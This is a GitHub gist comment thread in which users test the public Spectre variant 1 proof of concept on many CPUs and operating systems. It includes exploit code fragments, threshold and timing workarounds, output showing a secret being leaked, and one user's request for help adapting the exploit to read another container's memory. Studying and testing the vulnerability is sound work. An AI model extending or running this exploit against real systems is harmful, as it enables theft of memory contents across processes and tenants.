Interesting. Apparently, on AMD, whether or not LFENCE is effective as no-spec barrier depends on hardware MSR (MSR_F10H_DECFG) - so, you need a patched kernel to use LFENCE as a no-speculation barrier. It certainly looks like these changes were made by SUSE so that the usermode applications could use LFENCE as an inexpensive way to stop data dependencies from propagating beyond the bounds check. LFENCE is also currently being discussed on LKML as a way to implement similar checks Edit: the MSR_F10H_DECFG / MSR_F10H_DECFG_LFENCE_SERIALIZE_BIT patch has just been submitted to LKML: |
This comment has been minimized.
This comment has been minimized.
eyablokov
commented
Jan 5, 2018
•
|
MacBook Pro 15" with Touch Bar 2016 ~ → ./spectre --- spectre.c.old 2018-01-05 08:46:35.000000000 +0300 /* Report best guess in value[0] and runner-up in value[1] */
|
This comment has been minimized.
This comment has been minimized.
LionsAd
commented
Jan 5, 2018
|
@utf8everywhere Replacing won't work for more modern processors without the fence, but using my threaded version at https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2311156 should work everywhere. |
This comment has been minimized.
This comment has been minimized.
jamver
commented
Jan 5, 2018
|
Integrating all fixes above, with threading and displaying full secret and initialised recovered secret variables at top and final values at end. Compiles with clang on Mac OS X and gcc on Linux (CentOS). Diff against original gist Intel® Core(TM) i7-7820HQ CPU @ 2.90GHz (MacBookPro14,3 - 2017 15" MacBook Pro with Touchbar)
Intel(R) Xeon(R) CPU E5-2620 v3 @ 2.40GHz (CentOS Linux)
Full source code |
This comment has been minimized.
This comment has been minimized.
zoobab
commented
Jan 5, 2018
|
I need some help to split the code in a client/server to try to spy on the memory of another container (OpenVZ or Docker in this case): I have put a sleep 1000 after sscanf_s(argv[2], "%d", &len); I need to mod the code that the client manages to dump the memory of the server. This would be useful as well for other types of virtualization (kvm, vmware, etc...). |
This comment has been minimized.
This comment has been minimized.
Create-personal
commented
Jan 5, 2018
|
model name : Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz /spectre$ gcc -std=c99 -O0 spectre.c -o spectre Reading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
JonDaniel
commented
Jan 5, 2018
|
I don't think RedHat's fix has worked - https://access.redhat.com/security/vulnerabilities/speculativeexecution |
This comment has been minimized.
This comment has been minimized.
rich0
commented
Jan 5, 2018
|
@JonDaniel This is variant 1, and it can't be fixed with an OS update, unless it includes some kind of compiler fix to automatically apply mitigation and I don't think one exists just yet (though that could change at any time since it seems to be an area of activity). I don't know what was in the RH patch, but I suspect it just fixed the known-vulnerable function in the kernel. That would prevent that specific function from being attacked, but not other functions that have the same vulnerability. Think of variant 1 as a class of vulnerabilities, like a buffer overflow. You can fix a particular buffer overflow, but fixing them all requires changing how you write software, or building prevention into the compilers/language. That isn't a perfect analogy - this does rely on CPU behavior but it is still the case that any process that can interact with another process could contain vulnerable code. |
This comment has been minimized.
This comment has been minimized.
paulie51
commented
Jan 5, 2018
|
@JonDaniel Its been made incredibly unclear up to now, but the kernel patches are reliant on microcode and potential BIOS/firmware updates that have yet to be released for increased protection against Spectre. The kernel patch itself should be protecting against Meltdown (assuming you have an affected CPU). RH have indirectly clarified this with : https://access.redhat.com/articles/3311301#architectural-defaults-9 With no microcode update available (our situation) we can update and reboot for Meltdown protection, and alleged variant 1 protection but no variant 2 protection. I thought though that this PoC was for variant 1, but my brain is getting more and more addled as these days go on... |
This comment has been minimized.
This comment has been minimized.
linxon
commented
Jan 5, 2018
•
• cirno-chan /tmp $ uname -a
Linux cirno-chan 4.9.49-gentoo-r1 #2 SMP Sat Dec 30 23:16:31 MSK 2017 x86_64 AMD FX(tm)-6300 Six-Core Processor AuthenticAMD GNU/Linux+
• cirno-chan /tmp $
• cirno-chan /tmp $ gcc -std=c99 -O0 spectre.c -o spectre 2> /dev/null
• cirno-chan /tmp $
• cirno-chan /tmp $ ./spectre
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfee18... Success: 0x54=’T’ score=1
Reading at malicious_x = 0xffffffffffdfee19... Success: 0x68=’h’ score=1
Reading at malicious_x = 0xffffffffffdfee1a... Success: 0x65=’e’ score=1
Reading at malicious_x = 0xffffffffffdfee1b... Success: 0x20=’ ’ score=1
Reading at malicious_x = 0xffffffffffdfee1c... Success: 0x4D=’M’ score=1
Reading at malicious_x = 0xffffffffffdfee1d... Success: 0x61=’a’ score=1
Reading at malicious_x = 0xffffffffffdfee1e... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee1f... Success: 0x69=’i’ score=1
Reading at malicious_x = 0xffffffffffdfee20... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee21... Success: 0x20=’ ’ score=1
Reading at malicious_x = 0xffffffffffdfee22... Success: 0x57=’W’ score=2
Reading at malicious_x = 0xffffffffffdfee23... Success: 0x6F=’o’ score=1
Reading at malicious_x = 0xffffffffffdfee24... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffffffffffdfee25... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee26... Success: 0x73=’s’ score=1
Reading at malicious_x = 0xffffffffffdfee27... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee28... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffffffffffdfee29... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffffffffffdfee2a... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffffffffffdfee2b... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfee2c... Success: 0x53=’S’ score=2
Reading at malicious_x = 0xffffffffffdfee2d... Success: 0x71=’q’ score=1
Reading at malicious_x = 0xffffffffffdfee2e... Success: 0x75=’u’ score=2
Reading at malicious_x = 0xffffffffffdfee2f... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffffffffffdfee30... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffffffffffdfee31... Success: 0x6D=’m’ score=2
Reading at malicious_x = 0xffffffffffdfee32... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffffffffffdfee33... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfee34... Success: 0x68=’h’ score=2
Reading at malicious_x = 0xffffffffffdfee35... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfee36... Success: 0x4F=’O’ score=2
Reading at malicious_x = 0xffffffffffdfee37... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfee38... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffffffffffdfee39... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffffffffffdfee3a... Success: 0x66=’f’ score=2
Reading at malicious_x = 0xffffffffffdfee3b... Success: 0xFF=’�’ score=0
Reading at malicious_x = 0xffffffffffdfee3c... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffffffffffdfee3d... Success: 0x67=’g’ score=2
Reading at malicious_x = 0xffffffffffdfee3e... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffffffffffdfee3f... Success: 0x2E=’.’ score=2
• cirno-chan /tmp $
• cirno-chan /tmp $
• cirno-chan /tmp $ LANG="en_US" lscpu
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 6
On-line CPU(s) list: 0-5
Thread(s) per core: 2
Core(s) per socket: 3
Socket(s): 1
NUMA node(s): 1
Vendor ID: AuthenticAMD
CPU family: 21
Model: 2
Model name: AMD FX(tm)-6300 Six-Core Processor
Stepping: 0
CPU MHz: 3500.000
CPU max MHz: 3500.0000
CPU min MHz: 1400.0000
BogoMIPS: 7046.96
Virtualization: AMD-V
L1d cache: 16K
L1i cache: 64K
L2 cache: 2048K
L3 cache: 8192K
NUMA node0 CPU(s): 0-5
Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf eagerfpu pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core perfctr_nb cpb hw_pstate vmmcall bmi1 arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold |
This comment has been minimized.
This comment has been minimized.
array42
commented
Jan 5, 2018
•
|
-O2 and -O3 did not work for me. But -O1 and -O0 work with a Xeon X3450. But this poc does not work on another Intel Q9400 machine: Illegal instruction when compiled with gcc 4.8 and -march=native or -march=core2 or any tried architecture. Someone already mentioned, it does not work for his Q9300. |
This comment has been minimized.
This comment has been minimized.
citycat4
commented
Jan 5, 2018
|
@array42 try to use threaded version. Usually when non-threaded breaks with 'Illegal instruction', threaded works. |
This comment has been minimized.
This comment has been minimized.
eyes-0nly
commented
Jan 5, 2018
|
gcc (GCC) 7.2.1 20170915 (Red Hat 7.2.1-2)
And Intel(R) Pentium(R) CPU G3220 @ 3.00GHz
|
This comment has been minimized.
This comment has been minimized.
abhi-jha
commented
Jan 5, 2018
|
I am not getting the expected string. Any solutions? |
This comment has been minimized.
This comment has been minimized.
Mr0maks
commented
Jan 5, 2018
|
This comment has been minimized.
This comment has been minimized.
ghost
commented
Jan 5, 2018
•
|
I tryed to compile for ARM but #include <intrin.h> /* for rdtscp and clflush */ is not available for ARM Anyone ideas how to replace _mm_clflush on ARM architecture ? For __rdtscp' may the 2 thread aproch from LionsAd above will work |
This comment has been minimized.
This comment has been minimized.
DesmondFox
commented
Jan 5, 2018
Intel Pentium N3530. Windows 10 16299.192 |
This comment has been minimized.
This comment has been minimized.
hkmaly
commented
Jan 5, 2018
|
I got undefined reference to `_mm_clflush' when compiled without arguments and Illegal instruction with -march=native ... does it mean I'm not vulnerable or that I have compiler configured incorrectly? |
This comment has been minimized.
This comment has been minimized.
Postrediori
commented
Jan 5, 2018
|
Fedora 27. Added space after Everythg works. I also tried to launch it on the oldest CPU I have that is from 2004. Unfortunately, it appears to lack |
This comment has been minimized.
This comment has been minimized.
prozacgod
commented
Jan 5, 2018
•
|
For shits and grins, I modified main to produce a hex dump starting 100 bytes before the Magic, and reads 1000 bytes of data. I played with other addresses but I'm not sure about ... what it's reading, as it's probably just reading from the current process memory space or something? (out of my depth on that bit) Also, not that I really expected anything different, it compiles and run under "bash for windows 10" just fine. Oh I reduced the hysteresis on the score, if it's just a higher score than the second ... I call it "good enough", I still see failures occasionally. if it's less than #2 it just prints a failure "--" |
This comment has been minimized.
This comment has been minimized.
MGNute
commented
Jan 5, 2018
|
Visual Studio with and without /O2 |
This comment has been minimized.
This comment has been minimized.
AlessioCantina
commented
Jan 5, 2018
•
|
With @Symbian9 patches I get almost any letter incorrect on a Intel Core 2 Duo 2,66 GHz on macOS 10.11.6, I changed the main to make it search until the "Success" check passes I get a better result but not perfect. |
This comment has been minimized.
This comment has been minimized.
zoobab
commented
Jan 5, 2018
|
@klugemonkey I tested successfully on an openvz container: Now I am still looking at modifying the code to split between a client and a server, each of those in different containers. Stay tuned. |
This comment has been minimized.
This comment has been minimized.
kingsumos
commented
Jan 5, 2018
|
For older gcc versions (and mingw), here is an _mm_clflush() implementation, just copy/paste: static inline void _mm_clflush(volatile void __p) |
This comment has been minimized.
This comment has been minimized.
kingsumos
commented
Jan 5, 2018
•
|
If anyone wants to try this in PowerPC, check this gist: |
This comment has been minimized.
This comment has been minimized.
andrewdark1
commented
Jan 5, 2018
|
Online compilers - success |
This comment has been minimized.
This comment has been minimized.
vladern
commented
Jan 5, 2018
|
Intel I5 7300HQ |
This comment has been minimized.
This comment has been minimized.
NightUnix
commented
Jan 5, 2018
•
|
FX8350 Centos 7 x64 |
This comment has been minimized.
This comment has been minimized.
KarelWintersky
commented
Jan 5, 2018
•
Compile as Result: is my CPU absolutely vulnerable? |
This comment has been minimized.
This comment has been minimized.
diimdeep
commented
Jan 5, 2018
|
If you tried reading original pdf but stuck, recommend reading https://www.raspberrypi.org/blog/why-raspberry-pi-isnt-vulnerable-to-spectre-or-meltdown/ |
This comment has been minimized.
This comment has been minimized.
EXL
commented
Jan 5, 2018
Yes for Spectre. @NightActivity Try this patch for AMD FX/Ryzen: -#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
+#define CACHE_HIT_THRESHOLD (140) /* assume cache hit if time <= threshold */
-for (tries = 999; tries > 0; tries--) {
+for (tries = 99999; tries > 0; tries--) { |
This comment has been minimized.
This comment has been minimized.
Eliastik
commented
Jan 5, 2018
•
|
AMD FX 6300@3.5 GHz on Ubuntu 17.10 (kernel 4.13.0-21-generic) Changes: Compilation: Execution: EDIT: With changes from the previous comment: |
This comment has been minimized.
This comment has been minimized.
dimhotepus
commented
Jan 5, 2018
•
|
As already suggested, tune up And claim it is vulnerable, too. -#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
+#define CACHE_HIT_THRESHOLD (90) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
- int tries, i, j, k, mix_i, junk = 0;
+ int tries, i, j, k, mix_i;
+ unsigned int junk = 0;
volatile uint8_t * addr;
printf("0x%02X=’%c’ score=%d ", value[0],
- (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
+ (value[0] > 31 && value[0] < 127 ? value[0] : (uint8_t)'?'), score[0]); |
This comment has been minimized.
This comment has been minimized.
blackjec69
commented
Jan 5, 2018
|
People, if this code don't work - compile it with option "-m32 -march=pentium4 -O0" and change CACHE_HIT_THRESHOLD to 100 or above |
This comment has been minimized.
This comment has been minimized.
michael-brade
commented
Jan 5, 2018
|
I have the same question @ssstonebraker has: is there any C code like this to prove that meltdown is fixed on a patched system? In particular, I would like to test if a grsecurity system needs patching or not. Since grsecurity is only available on 4.9.x kernels, and not available publically for later kernels, I suppose that even once KPTI will be available for 4.9.x, the grsecurity patches won't apply anymore. Then the question becomes: what is more valuable, KPTI or grsecurity? |
This comment has been minimized.
This comment has been minimized.
jpmorrison
commented
Jan 5, 2018
•
|
@progman32 tried on a Core2 Duo with _rdtsc() and only a few characters are recovered. Intel says 2nd gen Core and newer are vulnerable. |
This comment has been minimized.
This comment has been minimized.
BatteryDie
commented
Jan 5, 2018
|
Tried code on Intel i5-6600k with WSL. Here is my result: |
This comment has been minimized.
This comment has been minimized.
Symbian9
commented
Jan 6, 2018
|
@michael-brade asked: "I have the same question @ssstonebraker has: is there any C code like this to prove that meltdown is fixed on a patched system?" Here is simple Shell script for check it ;-) |
This comment has been minimized.
This comment has been minimized.
ewheelerinc
commented
Jan 6, 2018
•
|
Running this under KVM I get the following, but it works fine on the hypervisor: using this CPU model: Am I missing something? |
This comment has been minimized.
This comment has been minimized.
kuleszdl
commented
Jan 6, 2018
|
@ewheelerinc did you compile spectre on the host with |
This comment has been minimized.
This comment has been minimized.
alexram2
commented
Jan 6, 2018
•
|
Work fine, then read from own memory, but not from other application. Create simple program Run test program Run spectre with agrs in other console. |
This comment has been minimized.
This comment has been minimized.
plukawski
commented
Jan 6, 2018
|
I have a question for those, who were able to reproduce that on AMD processors: Did you have to enable eBPF JIT for this exploit to work, or it just worked on standard system config? |
This comment has been minimized.
This comment has been minimized.
luisfarzati
commented
Jan 6, 2018
•
|
MacBook Pro (Retina, 13-inch, Early 2015) running macOS High Sierra 10.13.2 |
This comment has been minimized.
This comment has been minimized.
plukawski
commented
Jan 6, 2018
•
|
From what I see this PoC tries to read the secret from within its own process address space. The virtual address of the other process, even when passed as the first argument would mean nothing for the process executing this exploit. |
This comment has been minimized.
This comment has been minimized.
jms19
commented
Jan 6, 2018
|
Works fine on an (AMD) X II 250. |
This comment has been minimized.
This comment has been minimized.
dude-awesome
commented
Jan 6, 2018
|
Can‘t test it right now but will this also run on latest Intel Coffee Lake ? |
This comment has been minimized.
This comment has been minimized.
eimann
commented
Jan 6, 2018
•
|
SunOS hostname 5.11 joyent_20171109T032417Z i86pc i386 i86pc on ntel(R) Xeon(R) CPU E5620 @ 2.40GHz unmodified: threshold set to 100 |
This comment has been minimized.
This comment has been minimized.
dimhotepus
commented
Jan 6, 2018
•
|
@plukawski, for me (exploited AMD) Anyway, that's Spectre variant 1 from https://googleprojectzero.blogspot.com.by/2018/01/reading-privileged-memory-with-side.html
Correct me if i am wrong, but since we read same process address space and do not use eBPF JIT, its state is irrelevant. |
This comment has been minimized.
This comment has been minimized.
dimhotepus
commented
Jan 6, 2018
|
@alexram2 Correct me if i'm wrong, its due to virtual memory. Address you got in victim process is a virtual address, not a physical one. |
This comment has been minimized.
This comment has been minimized.
hardhub
commented
Jan 6, 2018
|
Threshold 150 AMD Phenom II X4 965 AMD FX-8320 Intel i7-6700 Intel Xeon 1230 v2
|
This comment has been minimized.
This comment has been minimized.
plukawski
commented
Jan 6, 2018
|
@dimhotepus, |
This comment has been minimized.
This comment has been minimized.
vladsf
commented
Jan 6, 2018
|
Fails on Core2 duo, OSX: $ sysctl -n machdep.cpu.brand_string $ ./spectre.out |
This comment has been minimized.
This comment has been minimized.
bnraggie
commented
Jan 6, 2018
•
|
@jamver Thanks for your updated source code! I tried it on my 3GHz iMac Intel Core 2 Duo, OSX 10.10.5 but the result I got was |
This comment has been minimized.
This comment has been minimized.
fleroviux
commented
Jan 6, 2018
|
Worked flawlessly on an Intel i7-3610QM with default threshold (80). Maybe will test on an AMD Phenom II X4 965 BE later. |
This comment has been minimized.
This comment has been minimized.
Create-personal
commented
Jan 6, 2018
|
@vladsf, @bnraggie `#include <stdio.h> /******************************************************************** char * secret = "The Magic Words are Squeamish Ossifrage."; uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */ void victim_function(size_t x) { /******************************************************************** /* Report best guess in value[0] and runner-up in value[1] */ for (i = 0; i < 256; i++) } int main(int argc, for (i = 0; i < sizeof(array2); i++) printf("Reading %d bytes:\n", len); |
This comment has been minimized.
This comment has been minimized.
coypoop
commented
Jan 6, 2018
|
For reproducing on an AMD Opteron running NetBSD-8.0 I changed 'rdtscp' with 'mfence; rdtsc'. |
This comment has been minimized.
This comment has been minimized.
klm366k
commented
Jan 6, 2018
|
To emulate RDTSCP/CLFLUSH wihout MSVC in old C compiler like Borlad C, Borland CBuilder etc. //**************** rdtscp MSVC emulate ************************ unsigned __int64 rdtscp (unsigned int *Aux) result = (((__int64)cycles_high << 32) | cycles_low ); } |
This comment has been minimized.
This comment has been minimized.
JohnTroony
commented
Jan 6, 2018
|
Windows 10 Pro x86_64, Intel(R) Core(TM) i7-2640M CPU. |
This comment has been minimized.
This comment has been minimized.
Bengt
commented
Jan 6, 2018
|
I can confirm the modifications of Erik August working on a Phenom II X6 1090t @ 6 x 3.0 GHz under Ubuntu 16.04.3. |
This comment has been minimized.
This comment has been minimized.
FacundoAreo
commented
Jan 7, 2018
•
|
@Hey
#gcc -march=native spectre.c
# Thanks all lot !!! |
This comment has been minimized.
This comment has been minimized.
ghost
commented
Jan 7, 2018
|
[root@s3rgp4rody-fedora PROGRAMMING]# gcc --std=c99 vuln_test.c -o spectre [root@s3rgp4rody-fedora PROGRAMMING]# ./spectre [root@s3rgp4rody-fedora PROGRAMMING]# cat /proc/cpuinfo |
This comment has been minimized.
This comment has been minimized.
ghost
commented
Jan 7, 2018
|
[root@localhost SERGBACKUP]# gcc --std=c99 vuln_test.c -o spectre [root@localhost SERGBACKUP]# ./spectre [root@localhost SERGBACKUP]# cat /proc/cpuinfo |
This comment has been minimized.
This comment has been minimized.
ghost
commented
Jan 7, 2018
|
[root@localhost-live SERGBACKUP]# gcc --std=c99 vuln_test.c -o spectre [root@localhost-live SERGBACKUP]# ./spectre [root@localhost-live SERGBACKUP]# cat /proc/cpuinfo |
This comment has been minimized.
This comment has been minimized.
EgZvor
commented
Jan 7, 2018
•
|
Reproduced |
This comment has been minimized.
This comment has been minimized.
ghost
commented
Jan 7, 2018
[root@localhost-live SERGBACKUP]# ./spectre [root@localhost-live SERGBACKUP]# cat /proc/cpuinfo |
This comment has been minimized.
This comment has been minimized.
aidenatt
commented
Jan 7, 2018
|
Just tested this on a dual Opteron 6128 machine, and it seemed to work fine. root@pve:~# ./spectre root@pve:~# lscpu |
This comment has been minimized.
This comment has been minimized.
Mno-hime
commented
Jan 7, 2018
|
OpenIndiana 2017.10 (illumos-1d443a9338 kernel) on i7-3610QM (as well as OpenIndiana as a Linux KVM VM): |
This comment has been minimized.
This comment has been minimized.
michael-brade
commented
Jan 7, 2018
|
@Symbian9 hehe, nice try :) But that whole script is probably more of a joke... I know when I compiled my kernel with KPTI, but that doesn't mean it's effective. I want to actually test and verify that it works. Such a script seems not to be available :(( |
This comment has been minimized.
This comment has been minimized.
Leohige
commented
Jan 7, 2018
|
Ubuntu 16.04, i5 4200u Reading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
j3k00
commented
Jan 7, 2018
•
MachineUbuntu 17.10 CPUChanges
Compilation:
Output |
This comment has been minimized.
This comment has been minimized.
veita
commented
Jan 7, 2018
|
Works with Silvermont/Linux 4.14.7 ( |
This comment has been minimized.
This comment has been minimized.
MWisBest
commented
Jan 7, 2018
|
Confirmed working on an AMD A10-4600M (family 15h model 10h, Trinity/Piledriver) with up-to-date Windows 10 64-bit. Required a few misc changes to compile with MSVC but those have mostly been mentioned already. RDTSCP works as-is because it is guaranteed to serialize, but for better compatibility RDTSC can be used with fences to ensure serialization, i.e.: All three fence types (lfence, sfence, mfence) are working for me... I was under the impression sfence and lfence were not serializing. lfence is much faster than sfence and mfence; sfence and mfence required increasing the cache hit threshold. cpuid also works for serialization but is slower than all fences, but it has the potential advantage of not needing SSE2. Using a fence instead of the delay loop in the training run did not work reliably, and a separate thread counter was also unreliable for me. Of course this entire mess is mitigated with a fence after the |
This comment has been minimized.
This comment has been minimized.
Bahat159
commented
Jan 8, 2018
•
|
Windows 10 Name gcc spectre.c For those of you still having problem compiling the code on windows "Remove the braces around CACHE_HIT_THRESHOLD (80) to CACHE_HIT_THRESHOLD 80, for it will compile successfully. |
This comment has been minimized.
This comment has been minimized.
JensAndree
commented
Jan 8, 2018
|
Confirmed working on older i7-3630QM Fujitsu laptop running built in Ubuntu, all latest patchlevel. $ lscpu $ gcc -std=c11 -o spectre spectre.c $ ./spectre |
This comment has been minimized.
This comment has been minimized.
bparinas
commented
Jan 8, 2018
|
no fix yet? ubuntu@jenkinsci:~$ ./spectre ubuntu@jenkinsci:~$ lscpu |
This comment has been minimized.
This comment has been minimized.
josephapg
commented
Jan 8, 2018
|
Intel Core i3-6006U Result 1 (/Od)Compile options: Result 2 (/O2)Compile options: |
This comment has been minimized.
This comment has been minimized.
ewheelerinc
commented
Jan 8, 2018
|
Actually it was compiled on the guest where it doesn't work and then copied to the host (hypervisor) where it does work. So its definitely not an -mnative thing. I just did gcc -std=c99 -o spectre spectre.c so nothing special. Is it possible that I've disabled a guest instruction needed to do the exploit? That would be neat. Here's GDB: So apparently rdtscp doesn't work. Is there another way to get high resolution time enough to exploit this bug without rdtscp? |
This comment has been minimized.
This comment has been minimized.
ewheelerinc
commented
Jan 8, 2018
|
@kuleszdl and everyone else: Well I was able to do this with clock_gettime and nanosecond resolution just fine in that KVM with a missing rdtscp: Just put this at the top of the code somewhere: and then compile like so: It produced the following: |
This comment has been minimized.
This comment has been minimized.
ewheelerinc
commented
Jan 8, 2018
|
Surprisingly, it works with usec resolution with gettimeofday: You can even reduce the precision to 10us (instead of 1us) like so, but then you need to increase tries to about 3000: Further reducing precision to 100us requires about 20000 or 30000 tries per byte to get good output: |
This comment has been minimized.
This comment has been minimized.
rwestergren
commented
Jan 8, 2018
This comment has been minimized.
This comment has been minimized.
quadpixels
commented
Jan 9, 2018
•
|
Did a sweep over the Cache Hit Threshold, both when optimization flag is turned on and off, on 2 processors, the AMD A4-5000 and Intel i5-4570 (the __rdtscp is replaced with a _mm_mfence() and a __rdtsc() b/c it makes results on the A4-5000 look more obvious). It seems that a threshold of 100~400 cycles works well for the A4-5000 with optimization turned off; a threshold of 60~260 cycles works well for i5-4570, when only the spectre is running, as having other programs exercising the cache may affect results as well.
|
This comment has been minimized.
This comment has been minimized.
ECJ70
commented
Jan 9, 2018
|
Hi, Output is: Not sure if the program works as expected, there are some warnings when compiling with MS visual studio 2017. Maybe that´s the problem.
|
This comment has been minimized.
This comment has been minimized.
aikoncwd
commented
Jan 9, 2018
|
@ECJ70 Line 135, swap "%c" to '%c', also in "?" into '?' |
This comment has been minimized.
This comment has been minimized.
42Bastian
commented
Jan 9, 2018
|
I tried it on a Cortex-A9 (ZYNQ 7000) in an RTOS task, but no success so far. ARM Ltd. states the CA9 is vulnerable to Spectre, so maybe I need to tweak some of the constants (which I do not yet quiet understand). |
This comment has been minimized.
This comment has been minimized.
ECJ70
commented
Jan 9, 2018
|
@aikoncwd I´m getting closer, just have to play a little bit around with the treshold value. Reading at malicious_x = FFFFF0E8... Unclear: 0x0E='?' score=59 (second best: 0x04 score=59) |
This comment has been minimized.
This comment has been minimized.
ECJ70
commented
Jan 9, 2018
|
Results maybe dependent on CPU-load. Reading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
kingsumos
commented
Jan 9, 2018
|
@ssstonebraker @michael-brade @Symbian9 |
This comment has been minimized.
This comment has been minimized.
tosha13
commented
Jan 9, 2018
•
|
Lenovo L450 antony@antony-L450: |
This comment has been minimized.
This comment has been minimized.
goranskular
commented
Jan 9, 2018
|
i8700k with 4.15.0.994 kernel Reading 40 bytes: |
This comment has been minimized.
This comment has been minimized.
brunoczim
commented
Jan 9, 2018
|
Could anyone actually read addresses from other processes? |
This comment has been minimized.
This comment has been minimized.
asm
commented
Jan 9, 2018
|
I noticed the cache timing method in this PoC is just using the fastest read time to pick the byte value. While this works most of the time, it's not always the most accurate. For fun, I used a neural network to pick the correct byte value and pushed the code here: https://github.com/asm/deep_spectre. Here's example output: ./spectre.py
Using TensorFlow backend.
Collecting training data...
Scaling data between 0-1...
Training deep model...
Train on 48000 samples, validate on 16000 samples
Epoch 1/10
48000/48000 [==============================] - 4s 83us/step - loss: 2.9168 - acc: 0.3363 - val_loss: 0.7985 - val_acc: 0.8276
Epoch 2/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.4543 - acc: 0.9007 - val_loss: 0.3505 - val_acc: 0.9204
Epoch 3/10
48000/48000 [==============================] - 4s 75us/step - loss: 0.2802 - acc: 0.9367 - val_loss: 0.2825 - val_acc: 0.9335
Epoch 4/10
48000/48000 [==============================] - 3s 73us/step - loss: 0.2516 - acc: 0.9441 - val_loss: 0.2948 - val_acc: 0.9293
Epoch 5/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.2368 - acc: 0.9451 - val_loss: 0.2640 - val_acc: 0.9361
Epoch 6/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.2320 - acc: 0.9460 - val_loss: 0.2765 - val_acc: 0.9360
Epoch 7/10
48000/48000 [==============================] - 3s 73us/step - loss: 0.2405 - acc: 0.9458 - val_loss: 0.2588 - val_acc: 0.9376
Epoch 8/10
48000/48000 [==============================] - 4s 74us/step - loss: 0.2324 - acc: 0.9468 - val_loss: 0.2502 - val_acc: 0.9403
Epoch 9/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.2269 - acc: 0.9474 - val_loss: 0.2452 - val_acc: 0.9408
Epoch 10/10
48000/48000 [==============================] - 3s 72us/step - loss: 0.2277 - acc: 0.9467 - val_loss: 0.2663 - val_acc: 0.9392
The secret message is: The Magic Words are Squeamish Ossifrage. |
This comment has been minimized.
This comment has been minimized.
pavlinux
commented
Jan 9, 2018
|
./a.out ... |
This comment has been minimized.
This comment has been minimized.
moonsyi
commented
Jan 10, 2018
|
uhhh, after the BIOS update, still can run the code. |
This comment has been minimized.
This comment has been minimized.
ghost
commented
Jan 10, 2018
|
AMD Phenom 9950 Quad-Core: |
This comment has been minimized.
This comment has been minimized.
MarkJurich
commented
Jan 10, 2018
•
|
FYI: To compile/link/run under Win7x64 & Visual Studio 2010, create a C++ Win32 Console Project (uncheck pre-compiled header check box), save as a .c source file, stay under "Debug" (no code optimization) vs "Release", and be aware of the following source code changes, depending if you start with this source or the original spectre.pdf research paper source (Copy & Pasted): Legend: This Source Line Number(Original PDF Paper Source Line Number): OriginalStringSegment --> NewStringSegment // Comment --( 13): */ --> */ // Copy & Paste from the Original PDF Source might need fixup at the end of comment The created .exe (I called it Spectre.exe) should run in a Command Window. I tested two up-to-date Win7x64 Systems, with the following CPUs, and Positive Results: Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz (Ivy Bridge) lenovo X230 The i5 had the (KAISER) Windows Update for MeltDown/Spectre, which doesn't do anything to stop this variant of Spectre. I'm still waiting for any possible firmware updates to apply to either system. On the i5 (yesterday), I played with the Cache Hit Threshold from about 25 up to 200 with Positive Results, if I recall correctly. |
This comment has been minimized.
This comment has been minimized.
nuvvanda
commented
Jan 10, 2018
|
I need some clarification. The spectre attack reads memory used by OTHER process that itself. In the example here the compiled executable file is reading ITS OWN memory trying tho show the secret word. I don't get it. |
This comment has been minimized.
This comment has been minimized.
MarkJurich
commented
Jan 10, 2018
•
|
You are exactly right. This example is a simple demonstration of how the attack works. If you read the research paper (spectre.pdf), there are descriptions of how it might be deployed via the web and attacking another application. This example attacks its own code to show how it works, in principle. It's actually not reading the string but executing code close to it, revealing the character string (essentially). Hope this helps. |
This comment has been minimized.
This comment has been minimized.
HenkPoley
commented
Jan 10, 2018
•
|
